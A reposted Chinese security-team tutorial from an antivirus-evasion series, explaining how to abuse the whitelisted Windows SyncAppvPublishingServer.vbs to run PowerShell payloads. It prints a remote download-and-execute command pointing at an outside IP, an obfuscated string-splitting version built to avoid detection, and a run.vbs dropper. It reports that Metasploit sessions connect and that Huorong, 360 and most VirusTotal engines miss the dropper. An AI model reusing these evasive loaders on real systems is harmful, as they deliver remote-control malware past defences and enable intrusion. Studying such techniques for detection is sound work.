远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

栏目: IT技术 · 发布时间: 4年前

内容简介:声明:

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

声明: Tide安全团队原创文章,转载请声明出处! 文中所涉及的技术、思路和 工具 仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载: https://github.com/TideSec/BypassAntiVirus

一、SyncAppvPublishingServer 简介

Windows上有两个版本的SyncAppVPublishingServer工具,它们是:SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。

二、SyncAppvPublishingServer 使用

在powershell下执行

SyncAppvPublishingServer.vbs break;powershell代码

测试过程中使用的是SyncAppvPublishingServer.vbs,SyncAppvPublishingServer.exe 没有成功

在cmd里是无法执行powershell命令的

该命令需要在powershell里进行执行

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

因此powershell脚本都可以通过SyncAppvPublishingServer.vbs来运行。

三、SyncAppvPublishingServer 执行payload

使用powershell木马。

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"

将powershell脚本进行混淆使用IEX远程加载执行payload。

$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

msf可正常上线。

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

在实战中也可以直接写成vbs脚本 run.vbs 

Set oShell=WScript.CreateObject("WScript.Shell")

oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

点击run.vbs也可以正常上线。

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

火绒、360均没有检测出

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

放在virustotal.com上a.bat查杀率为1/56

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

四、参考资料

Powershell Without Powershell.exe

https://www.youtube.com/watch?v=sema3EYnP2c

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

guān

zhù

men

Tide安全团队正式成立于2019年1月 是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以 关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload

远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload


以上所述就是小编给大家介绍的《远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
Egret——HTML5游戏开发指南

Egret——HTML5游戏开发指南

张鑫磊 等 / 电子工业出版社 / 2016-3 / 85

《Egret——HTML5游戏开发指南》由浅入深,在讲解游戏开发基础的同时提供众多实战案例供读者学习。《Egret——HTML5游戏开发指南》章节内容包含Egret基础概念及基础图形图像处理方法、网络相关操作、移动设备适配、性能优化、文本动画相关知识、调试技巧、DragonBones骨骼动画系统和P2物理引擎等。通过《Egret——HTML5游戏开发指南》,读者可以了解并掌握HTML5游戏开发技能......一起来看看 《Egret——HTML5游戏开发指南》 这本书的介绍吧!

码农工具
CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2024 码农网 粤ICP备17054400号-3